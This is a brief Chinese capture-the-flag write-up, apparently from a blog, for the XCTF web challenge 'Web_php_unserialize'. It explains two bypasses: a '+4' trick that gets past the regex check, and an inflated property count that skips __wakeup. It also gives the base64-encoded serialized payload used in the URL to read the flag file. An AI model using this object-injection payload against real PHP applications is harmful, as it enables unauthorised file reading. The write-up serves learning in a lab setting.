XCTF--WEB Web_php_unserialize

Web_php_unserialize

打开题目发现是一段php代码
我对其进行审计如图:
XCTF--WEB Web_php_unserialize_第1张图片
进行反序列化得:“O:4:“Demo”:1:{s:10:“Demofile”;s:8:“fl4g.php”;}”
正则匹配的就是 O:4 ,在这里我们将4改为+4即可绕过在反序列化后会执行_wakeup()将file的值修改导致文件读取失败
此处把序列化语句中的1替换成2,即当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。得到:“O:+4:“Demo”:2:{s:10:“Demofile”;s:8:“fl4g.php”;}”
按照题目要求反序列化一下即可
/index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
得到flag
XCTF--WEB Web_php_unserialize_第2张图片

你可能感兴趣的:(CTF)